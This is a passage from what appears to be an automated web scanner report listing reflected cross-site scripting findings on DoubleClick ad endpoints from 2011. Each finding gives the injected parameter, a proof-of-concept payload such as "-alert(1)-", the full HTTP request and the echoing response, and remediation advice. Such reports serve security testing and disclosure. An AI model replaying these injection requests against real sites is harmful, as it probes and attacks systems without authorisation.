l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad6/f/18b/%2a/b%3B234428571%3B0-0%3B0%3B50265527%3B3454-728/90%3B38431379/38449136/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lc1e51"-alert(1)-"b2b22d2d3e9&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl
...[SNIP]...

5.7. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccbd9"-alert(1)-"b691060660c was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=ccbd9"-alert(1)-"b691060660c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6855
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 25 Mar 2011 19:17:44 GMT
Expires: Fri, 25 Mar 2011 19:17:44 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
zovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=ccbd9"-alert(1)-"b691060660chttp://learning.capella.edu/banners.aspx?revkey=151364");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...

5.8. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ead3"-alert(1)-"0df83226a7e was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ8ead3"-alert(1)-"0df83226a7e&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:14:32 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:14:32 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
nAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ8ead3"-alert(1)-"0df83226a7e&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

5.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93684"-alert(1)-"04063d9d42c was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-406387893378091293684"-alert(1)-"04063d9d42c&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:16:56 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:16:56 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
U6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-406387893378091293684"-alert(1)-"04063d9d42c&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

5.10. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78ad2"-alert(1)-"0cffce0ff89 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=178ad2"-alert(1)-"0cffce0ff89&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:15:20 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:15:20 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
wMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=178ad2"-alert(1)-"0cffce0ff89&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

5.11. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13934"-alert(1)-"2f40d37216e was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A13934"-alert(1)-"2f40d37216e&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:16:11 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:16:11 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A13934"-alert(1)-"2f40d37216e&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

5.12. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c8a"-alert(1)-"74dc35f103c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=la9c8a"-alert(1)-"74dc35f103c&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:13:57 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:13:57 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad5/f/18f/%2a/p%3B236512240%3B4-0%3B0%3B41471883%3B3454-728/90%3B40692123/40709910/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=la9c8a"-alert(1)-"74dc35f103c&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRt
...[SNIP]...

5.13. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a46e1"-alert(1)-"4aa4ff748f7 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a46e1"-alert(1)-"4aa4ff748f7&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:24 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:24 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a46e1"-alert(1)-"4aa4ff748f7&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3
...[SNIP]...

5.14. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9f72'-alert(1)-'29bf1bc4357 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

